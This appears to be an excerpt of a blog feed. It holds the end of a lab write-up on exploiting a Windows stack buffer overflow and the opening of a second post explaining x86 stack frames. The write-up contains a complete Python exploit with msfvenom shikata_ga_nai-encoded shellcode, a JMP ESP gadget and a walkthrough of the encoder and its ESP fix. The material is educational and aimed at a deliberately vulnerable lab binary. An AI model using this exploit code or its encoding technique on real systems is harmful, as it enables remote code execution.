Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 220 (iteration=0)
Payload size: 220 bytes
</code></pre><p><code>shikata_ga_nai</code> is a polymorphic XOR additive feedback encoder. It wraps the shellcode in a self-decoding stub. When the shellcode runs, the decoder executes first. It XORs the encoded payload back to its original value four bytes at a time, updating the key from each decoded block as it goes, and execution then falls through into the decoded shellcode. The encoded form sitting in the payload never actually contains the bad characters. They exist only in the decoded form that gets reconstructed at runtime in memory.</p>
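<p>The idea behind an XOR encoder with key feedback can be shown with a toy model. This is a simplified sketch and not Metasploit's implementation: the function names are hypothetical, the feedback rule (add each plaintext block to the key) is an assumption chosen for illustration, and the real encoder also emits and randomizes the decoder stub itself.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python">def xor_feedback(data, key, decode=False):
    """Toy XOR additive-feedback transform over 4-byte little-endian blocks."""
    if len(data) % 4:
        raise ValueError("pad data to a multiple of 4 bytes first")
    out = bytearray()
    for i in range(0, len(data), 4):
        block = int.from_bytes(data[i:i + 4], "little")
        result = block ^ key
        plain = result if decode else block
        # Feedback: the key for the next block depends on this block's plaintext
        key = (key + plain) % 2**32
        out += result.to_bytes(4, "little")
    return bytes(out)


def find_key(plain, bad_bytes=b"\x00"):
    """Brute-force a key whose own bytes and encoded output avoid bad_bytes."""
    for key in range(0x01010101, 2**32):
        candidate = key.to_bytes(4, "little") + xor_feedback(plain, key)
        if not any(b in bad_bytes for b in candidate):
            return key
    raise ValueError("no suitable key found")
</code></pre></div>
<p>Encoding with a key from <code>find_key()</code> yields output free of the listed bad bytes even when the plaintext contains them, and calling <code>xor_feedback()</code> again with <code>decode=True</code> and the same starting key restores the original.</p>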
<hr>
<h2 id="the-decoder-problem-and-the-fix">The Decoder Problem and the Fix</h2>
<p>The <code>shikata_ga_nai</code> decoder writes to memory around ESP before it decodes anything. To find its own address it executes an FPU instruction followed by <code>fnstenv [esp-0xc]</code>, which stores a 28-byte FPU environment record covering ESP-12 through ESP+15, and then pops the saved instruction pointer off the stack. After <code>JMP ESP</code> fires, ESP points at the very first byte of the shellcode, so the upper 16 bytes of that record land on top of decoder instructions that have not executed yet. The shellcode corrupts itself before it finishes unpacking and crashes.</p>
<p>The fix is to create distance between ESP and the start of the shellcode before the decoder begins running.</p>
<p><strong>Option 1: NOP sled.</strong> Prepend <code>0x90</code> bytes before the shellcode. Each NOP is a single byte instruction that does nothing except advance EIP by one. ESP does not move. After sliding through 16 NOPs, EIP is pointing at the shellcode but ESP is still 16 bytes behind, sitting in the sled. When the decoder runs and writes scratch values relative to ESP, those writes land in the NOP sled area, which has already been executed and does not matter.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;A&#34;</span> <span class="o">*</span> <span class="mi">68</span> <span class="o">+</span> <span class="n">jmp_esp</span> <span class="o">+</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x90</span><span class="s2">&#34;</span> <span class="o">*</span> <span class="mi">16</span> <span class="o">+</span> <span class="n">buf</span>
</span></span></code></pre></div><p><strong>Option 2: sub esp prefix.</strong> Prepend <code>sub esp, 0x10</code> before the shellcode. This is the opcode <code>\x83\xec\x10</code>. It is a single 3-byte instruction that subtracts 16 from ESP, moving it 16 bytes below the shellcode. The decoder then has clean scratch space that does not overlap with the encoded payload at all.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="n">payload</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;A&#34;</span> <span class="o">*</span> <span class="mi">68</span> <span class="o">+</span> <span class="n">jmp_esp</span> <span class="o">+</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x83\xec\x10</span><span class="s2">&#34;</span> <span class="o">+</span> <span class="n">buf</span>
</span></span></code></pre></div><p>Both approaches solve the same problem. The <code>sub esp</code> version costs 3 bytes instead of 16, which is worth knowing when buffer space is tight.</p>
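<p>A minimal sketch of why either prefix works, assuming the decoder stub&rsquo;s <code>fnstenv [esp-0xc]</code> (the <code>d9 74 24 f4</code> bytes in the shellcode) stores a 28-byte FPU environment, which is its size in 32-bit protected mode. Positions are payload offsets from the layout used in this post. The helper names <code>scratch_range</code> and <code>overlaps_shellcode</code> are illustrative and not part of the exploit.</p>

```python
FNSTENV_SIZE = 28      # assumption: bytes stored by fnstenv in 32-bit protected mode
FNSTENV_DISP = -0x0c   # the stub uses fnstenv [esp-0xc]
RET_OFFSET = 68        # payload offset of the overwritten return address


def scratch_range(esp):
    """Payload offsets [start, end) written by fnstenv for a given ESP."""
    start = esp + FNSTENV_DISP
    return start, start + FNSTENV_SIZE


def overlaps_shellcode(prefix_len, esp_adjust):
    """True if the scratch write would reach the encoded shellcode."""
    esp_at_jmp = RET_OFFSET + 4               # ret leaves ESP just past the gadget address
    shellcode_start = esp_at_jmp + prefix_len
    _, end = scratch_range(esp_at_jmp - esp_adjust)
    return end > shellcode_start


print("no prefix    :", overlaps_shellcode(0, 0))
print("16-byte sled :", overlaps_shellcode(16, 0))
print("sub esp,0x10 :", overlaps_shellcode(3, 0x10))
```

<p>Under these assumptions only the no-prefix case reports an overlap. This is a model of the offsets, not a substitute for checking the real writes in the debugger.</p>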
<hr>
<h2 id="the-full-exploit">The Full Exploit</h2>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">socket</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">struct</span>
</span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">sys</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">TARGET_IP</span>   <span class="o">=</span> <span class="s2">&#34;192.168.122.85&#34;</span>
</span></span><span class="line"><span class="cl"><span class="n">TARGET_PORT</span> <span class="o">=</span> <span class="mi">4444</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">exploit</span><span class="p">():</span>
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Target     : </span><span class="si">{</span><span class="n">TARGET_IP</span><span class="si">}</span><span class="s2">:</span><span class="si">{</span><span class="n">TARGET_PORT</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Gadget     : JMP ESP @ 0x75d099fd (msvcrt.dll)&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Bad chars  : </span><span class="se">\\</span><span class="s2">x00&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Encoder    : x86/shikata_ga_nai&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">jmp_esp</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s2">&#34;&lt;I&#34;</span><span class="p">,</span> <span class="mh">0x75d099fd</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="c1"># msfvenom -p windows/exec CMD=calc.exe -b &#34;\x00&#34; -f python</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span>  <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xda\xcf\xbf\xb9\x47\xc3\xec\xd9\x74\x24\xf4\x58</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x33\xc9\xb1\x31\x31\x78\x18\x03\x78\x18\x83\xe8</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x45\xa5\x36\x10\x5d\xa8\xb9\xe9\x9d\xcd\x30\x0c</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xac\xcd\x27\x44\x9e\xfd\x2c\x08\x12\x75\x60\xb9</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xa1\xfb\xad\xce\x02\xb1\x8b\xe1\x93\xea\xe8\x60</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x17\xf1\x3c\x43\x26\x3a\x31\x82\x6f\x27\xb8\xd6</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x38\x23\x6f\xc7\x4d\x79\xac\x6c\x1d\x6f\xb4\x91</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xd5\x8e\x95\x07\x6e\xc9\x35\xa9\xa3\x61\x7c\xb1</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xa0\x4c\x36\x4a\x12\x3a\xc9\x9a\x6b\xc3\x66\xe3</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x44\x36\x76\x23\x62\xa9\x0d\x5d\x91\x54\x16\x9a</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xe8\x82\x93\x39\x4a\x40\x03\xe6\x6b\x85\xd2\x6d</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x67\x62\x90\x2a\x6b\x75\x75\x41\x97\xfe\x78\x86</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x1e\x44\x5f\x02\x7b\x1e\xfe\x13\x21\xf1\xff\x44</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x8a\xae\xa5\x0f\x26\xba\xd7\x4d\x2c\x3d\x65\xe8</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x02\x3d\x75\xf3\x32\x56\x44\x78\xdd\x21\x59\xab</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x9a\xe3\xc2\xcb\xb4\x93\xac\x61\xf9\xf9\x4e\x5c</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x3d\x04\xcd\x55\xbd\xf3\xcd\x1f\xb8\xb8\x49\xf3</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\xb0\xd1\x3f\xf3\x67\xd1\x15\x90\xe6\x41\xf5\x79</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">    <span class="n">buf</span> <span class="o">+=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x8d\xe1\x9c\x85</span><span class="s2">&#34;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">sub_esp</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;</span><span class="se">\x83\xec\x10</span><span class="s2">&#34;</span>           <span class="c1"># sub esp, 0x10</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="n">payload</span>  <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;A&#34;</span> <span class="o">*</span> <span class="mi">68</span>                <span class="c1"># fill buf[64] + overwrite saved EBP</span>
</span></span><span class="line"><span class="cl">    <span class="n">payload</span> <span class="o">+=</span> <span class="n">jmp_esp</span>                  <span class="c1"># overwrite return address with JMP ESP gadget</span>
</span></span><span class="line"><span class="cl">    <span class="n">payload</span> <span class="o">+=</span> <span class="n">sub_esp</span>                  <span class="c1"># move ESP away before decoder runs</span>
</span></span><span class="line"><span class="cl">    <span class="n">payload</span> <span class="o">+=</span> <span class="n">buf</span>                      <span class="c1"># shikata_ga_nai encoded shellcode</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Payload    : </span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span><span class="si">}</span><span class="s2"> bytes&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[*] Layout     : [A x68] [JMP ESP] [sub esp,10] [shellcode x</span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span><span class="si">}</span><span class="s2">]&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="k">try</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="n">TARGET_IP</span><span class="p">,</span> <span class="n">TARGET_PORT</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[+] Connected&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">s</span><span class="o">.</span><span class="n">sendall</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[+] Payload sent&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">s</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[+] Done. Check target for calc.exe&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">except</span> <span class="ne">ConnectionRefusedError</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[-] Connection refused. Is the service running?&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">    <span class="k">except</span> <span class="ne">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">        <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">&#34;[-] Error: </span><span class="si">{</span><span class="n">e</span><span class="si">}</span><span class="s2">&#34;</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">        <span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">&#34;__main__&#34;</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">    <span class="n">exploit</span><span class="p">()</span>
</span></span></code></pre></div><hr>
<h2 id="payload-layout">Payload Layout</h2>
<pre tabindex="0"><code>Offset 0-67   :  A x 68         fills buf[64], overwrites saved EBP
Offset 68-71  :  fd 99 d0 75    JMP ESP address in little-endian
Offset 72-74  :  83 ec 10       sub esp, 0x10 (3 bytes)
Offset 75+    :  shellcode       220 bytes, shikata_ga_nai encoded
Total         :  295 bytes
</code></pre><hr>
<h2 id="execution-chain">Execution Chain</h2>
<p>Here is exactly what happens from the moment the payload lands:</p>
<ol>
<li>The service receives 295 bytes into <code>input</code> via <code>recv()</code>.</li>
<li><code>vulnerable(input)</code> gets called. The prologue sets up the stack frame.</li>
<li><code>strcpy(buf, input)</code> copies the payload into <code>buf</code>. It fills 64 bytes into the buffer, overwrites saved EBP with <code>0x41414141</code>, and overwrites the return address with <code>0x75d099fd</code>.</li>
<li><code>printf</code> runs and prints the garbled output. No crash yet because only stack data was corrupted, not any executing code.</li>
<li>The epilogue runs. <code>mov esp, ebp</code> collapses the local frame. <code>pop ebp</code> loads <code>0x41414141</code> into EBP. <code>ret</code> pops <code>0x75d099fd</code> into EIP.</li>
<li>The CPU jumps to <code>0x75d099fd</code> inside <code>msvcrt.dll</code>. The instruction at that address is <code>JMP ESP</code>.</li>
<li><code>JMP ESP</code> jumps to the address held in ESP. After <code>ret</code> popped the return address, ESP points at payload offset 72, which is <code>\x83\xec\x10</code>.</li>
<li><code>sub esp, 0x10</code> executes. ESP moves 16 bytes downward, away from the shellcode.</li>
<li>The shikata_ga_nai decoder stub runs. Its scratch writes relative to ESP land 16 bytes below the shellcode. No corruption.</li>
<li>The decoder finishes unpacking and jumps into the decoded shellcode.</li>
<li>The shellcode resolves Windows API addresses and calls <code>WinExec(&quot;calc.exe&quot;, 1)</code>.</li>
<li><code>calc.exe</code> opens on the target.</li>
</ol>
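<p>The byte counts quoted in the steps above can be re-derived with a few lines of Python. This is only a bookkeeping sketch: the region sizes are taken from the exploit script, and the <code>layout</code> helper is an illustrative name.</p>

```python
FILLER_LEN = 68            # buf[64] plus the 4-byte saved EBP
GADGET_LEN = 4             # little-endian JMP ESP address
PREFIX = b"\x83\xec\x10"   # sub esp, 0x10
SHELLCODE_LEN = 220        # length of the encoded buf in the exploit


def layout():
    """Return ([(name, first_offset, last_offset), ...], total_length)."""
    regions = [
        ("filler", FILLER_LEN),
        ("jmp_esp", GADGET_LEN),
        ("sub_esp", len(PREFIX)),
        ("shellcode", SHELLCODE_LEN),
    ]
    out, pos = [], 0
    for name, size in regions:
        out.append((name, pos, pos + size - 1))
        pos += size
    return out, pos


regions, total = layout()
for name, first, last in regions:
    print(f"{name:<9} {first:>3}-{last}")
print("total", total)
```

<p>If the filler length, prefix, or shellcode changes, rerunning this keeps the offsets in the write-up honest.</p>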
<hr>
<h2 id="windbg-stack-dump-at-execution">WinDbg Stack Dump at Execution</h2>
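<p>Stack contents captured right as the shellcode was executing, showing the <code>sub esp</code> prefix at <code>011ff63c</code> (eight bytes into the first row) and the fully decoded shellcode in memory. The rows between <code>011ff684</code> and <code>011ff713</code> are omitted, so only the <code>lc.exe</code> tail of the <code>calc.exe</code> string is visible at <code>011ff714</code>:</p>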
<pre tabindex="0"><code>011ff634  00 00 00 00 00 00 ff ff-83 ec 10 d9 ec ba 67 d7
011ff644  2f 5e d9 74 24 f4 5f 29-c9 b1 31 31 57 18 83 c7
011ff654  04 03 57 14 e2 f5 fc e8-82 00 00 00 60 89 e5 31
011ff664  c0 64 8b 50 30 8b 52 0c-8b 52 14 8b 72 28 0f b7
011ff674  4a 26 31 ff ac 3c 61 7c-02 2c 20 c1 cf 0d 01 c7
011ff714  6c 63 2e 65 78 65 00 01-00 0c bb 21 02 c0 b7 5d
</code></pre><hr>
<h2 id="key-takeaways">Key Takeaways</h2>
<p><code>ret</code> is just <code>pop eip</code>. Control what sits at ESP when <code>ret</code> executes and you control the CPU. That one primitive is what every stack overflow is built on.</p>
<p>Knowing the stack layout cold matters more than any tool. Offset to EIP, what sits between the buffer and the return address, which direction the overflow travels. These need to be automatic before touching an exploit.</p>
<p>Every byte in the payload has a job. Filler, gadget address, decoder protection, shellcode. One wrong byte causes a crash with no obvious indication of where it went wrong. Build and verify each piece separately before assembling the full payload.</p>
<p>Bad character enumeration is not optional. A single corrupted byte mid-shellcode produces a failure that looks identical to any other crash. Do the enumeration before generating shellcode, every time.</p>
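<p>A minimal sketch of the enumeration step, assuming the usual approach of sending every byte value once and comparing against what the debugger shows. The function names are illustrative, and <code>seen_in_memory</code> stands for bytes you copy out of a memory dump by hand.</p>

```python
def badchar_probe(known_bad=b"\x00"):
    """All byte values 0x00-0xff in order, minus the ones already known to be bad."""
    return bytes(b for b in range(256) if b not in known_bad)


def first_mismatch(sent, seen_in_memory):
    """Index of the first byte that differs, or None if everything arrived intact."""
    for i, (a, b) in enumerate(zip(sent, seen_in_memory)):
        if a != b:
            return i
    if len(seen_in_memory) < len(sent):
        return len(seen_in_memory)   # the copy was cut short at this position
    return None


probe = badchar_probe()
print(len(probe), "probe bytes, starting with", hex(probe[0]))
```

<p>Each time a mismatch turns up, add the offending byte to <code>known_bad</code>, regenerate the probe, and send it again until nothing differs.</p>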
<p>The debugger tells the truth. <code>dd esp</code>, <code>db esp</code>, <code>r eip</code>, <code>u eip</code>. When something crashes, the answer is in the register dump and the stack contents. Not in the source code, not in intuition.</p>
<hr>
<p><em>This exploit runs against a deliberately vulnerable lab binary compiled without modern mitigations. It is a learning exercise.</em></p>
]]></content:encoded></item><item><title>Stack Frames - The Foundation of Every Stack Overflow</title><link>https://4w4647.github.io/posts/stack-frames-the-foundation-of-every-stack-overflow/</link><pubDate>Thu, 30 Apr 2026 04:06:54 +0545</pubDate><guid>https://4w4647.github.io/posts/stack-frames-the-foundation-of-every-stack-overflow/</guid><description>A deep dive into x86 stack frames, prologues, epilogues, calling conventions, little-endian memory, and how a simple buffer overflow leads to EIP control.</description><content:encoded><![CDATA[<h2 id="where-everything-starts">Where Everything Starts</h2>
<p>Before you write a single byte of shellcode, before you talk about ROP chains or DEP bypasses, there is one mental model you need to have locked in cold. The stack frame.</p>
<p>Every stack-based exploit ever written comes down to the same thing: you overflow a buffer, you overwrite a return address, and when the function returns, the CPU jumps somewhere you control. That&rsquo;s it. The techniques that come later are just clever ways of working around defenses layered on top of that same primitive.</p>
<p>So let&rsquo;s build the model from scratch, at the instruction level, with no hand-waving.</p>
<hr>
<h2 id="the-x86-stack">The x86 Stack</h2>
<p>The stack is a region of memory that grows <strong>downward</strong>. Higher addresses are at the top conceptually, but as you push things onto the stack, the stack pointer moves toward lower addresses.</p>
<p>Two registers manage it:</p>
<ul>
<li><strong>ESP</strong> (Stack Pointer) always points to the top of the stack, which is the lowest address currently in use</li>
<li><strong>EBP</strong> (Base Pointer) anchors the current function&rsquo;s frame so locals and arguments can be accessed at fixed offsets</li>
</ul>
<p>Every <code>push</code> subtracts 4 from ESP and writes a value there. Every <code>pop</code> reads from ESP and adds 4. That is the whole mechanism.</p>
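<p>The push and pop mechanics can be sketched as a toy model in Python. The <code>Stack</code> class and its 64-byte memory are made up for illustration, and addresses are just indexes into a <code>bytearray</code>.</p>

```python
import struct


class Stack:
    """Toy model of a downward-growing x86 stack backed by a bytearray."""

    def __init__(self, size=64):
        self.mem = bytearray(size)
        self.esp = size               # empty stack: ESP sits just past the highest address

    def push(self, value):
        self.esp -= 4                 # ESP moves toward lower addresses first
        struct.pack_into("<I", self.mem, self.esp, value)

    def pop(self):
        (value,) = struct.unpack_from("<I", self.mem, self.esp)
        self.esp += 4                 # then ESP moves back up
        return value


s = Stack()
s.push(2)
s.push(1)
print("ESP after two pushes:", s.esp)
```

<p>The last value pushed is the first one popped, and ESP always ends up at the lowest address in use.</p>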
<hr>
<h2 id="before-the-function-the-callers-job">Before the Function: The Caller&rsquo;s Job</h2>
<p>Take this C code:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="kt">void</span> <span class="nf">foo</span><span class="p">(</span><span class="kt">int</span> <span class="n">a</span><span class="p">,</span> <span class="kt">int</span> <span class="n">b</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">    <span class="kt">int</span> <span class="n">x</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"> 
</span></span><span class="line"><span class="cl"><span class="nf">foo</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span>
</span></span></code></pre></div><p>Before <code>foo</code> starts executing, the <strong>caller</strong> has to get the arguments onto the stack. In the <strong>cdecl calling convention</strong> (the default for most x86 C code), arguments are pushed right to left. Last argument first, first argument last.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">push</span> <span class="mi">2</span>          <span class="c1">; push b first (last argument)</span>
</span></span><span class="line"><span class="cl"><span class="nf">push</span> <span class="mi">1</span>          <span class="c1">; push a second (first argument)</span>
</span></span><span class="line"><span class="cl"><span class="nf">call</span> <span class="nv">foo</span>        <span class="c1">; now jump into foo</span>
</span></span></code></pre></div><p>Why right to left? Because after the push sequence, the first argument ends up closest to the top of the stack. Once the frame is set up, <code>a</code> will be at <code>[ebp+8]</code> and <code>b</code> will be at <code>[ebp+12]</code>, consistently, regardless of how many arguments there are. This is why <code>printf</code> can take a variable number of arguments and still find the first one reliably.</p>
<p><strong>What does CALL actually do?</strong></p>
<p><code>CALL</code> is not magic. Conceptually it is equivalent to two instructions (x86 has no literal <code>push eip</code>, so read the first line as pseudocode):</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">push</span> <span class="nv">eip</span>        <span class="c1">; push the address of the instruction after CALL</span>
</span></span><span class="line"><span class="cl"><span class="nf">jmp</span> <span class="nv">foo</span>         <span class="c1">; jump to foo</span>
</span></span></code></pre></div><p>The address it pushes is called the <strong>return address</strong>. It is where execution will resume after <code>foo</code> finishes. Without it, the program would have no idea where to go back to.</p>
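<p>As a rough sketch, the caller-side sequence for <code>foo(1, 2)</code> can be modelled with a dictionary standing in for memory. The addresses <code>0x1000</code>, <code>0x401000</code> and <code>0x402000</code> are arbitrary placeholders, and the 5-byte length assumes a near relative <code>call</code>.</p>

```python
def push(mem, esp, value):
    """Decrement ESP by 4 and store value at the new top of stack."""
    esp -= 4
    mem[esp] = value
    return esp


def call(mem, esp, eip, target, insn_len=5):
    """CALL: push the address of the next instruction, then jump to target."""
    return_address = eip + insn_len   # a near relative CALL is 5 bytes long
    esp = push(mem, esp, return_address)
    return esp, target


mem = {}
esp = 0x1000                          # placeholder starting ESP
esp = push(mem, esp, 2)               # argument b
esp = push(mem, esp, 1)               # argument a
esp, eip = call(mem, esp, eip=0x401000, target=0x402000)

for addr in sorted(mem, reverse=True):
    print(hex(addr), hex(mem[addr]))
```

<p>Printed from high to low addresses, the three slots match the order in which the caller and <code>CALL</code> put them there.</p>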
<p>At this point, just before <code>foo</code> starts, the stack looks like this:</p>
<pre tabindex="0"><code>High Address
┌─────────────────┐
│        2        │  argument b
├─────────────────┤
│        1        │  argument a
├─────────────────┤
│  return address │  pushed by CALL, ESP points here
└─────────────────┘
Low Address
</code></pre><hr>
<h2 id="inside-the-function-the-prologue">Inside the Function: The Prologue</h2>
<p>The moment execution lands inside <code>foo</code>, the first three instructions you will almost always see are the <strong>prologue</strong>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-nasm" data-lang="nasm"><span class="line"><span class="cl"><span class="nf">push</span> <span class="nb">ebp</span>        <span class="c1">; save the caller&#39;s base pointer onto the stack</span>
</span></span><span class="line"><span class="cl"><span class="nf">mov</span> <span class="nb">ebp</span><span class="p">,</span> <span class="nb">esp</span>    <span class="c1">; point EBP at the current top of stack</span>
</span></span><span class="line"><span class="cl"><span class="nf">sub</span> <span class="nb">esp</span><span class="p">,</span> <span class="mi">20</span>     <span class="c1">; carve out 20 bytes for local variables</span>
</span></span></code></pre></div><p>Walk through each one:</p>
<p><strong><code>push ebp</code></strong> saves the caller&rsquo;s EBP so it can be restored later. Every function does this so the chain of stack frames stays intact.</p>
<p><strong><code>mov ebp, esp</code></strong> sets EBP to the current value of ESP. From this point forward, EBP is fixed for the duration of the function. It does not move. This gives you a stable anchor to reference locals and arguments by offset.</p>
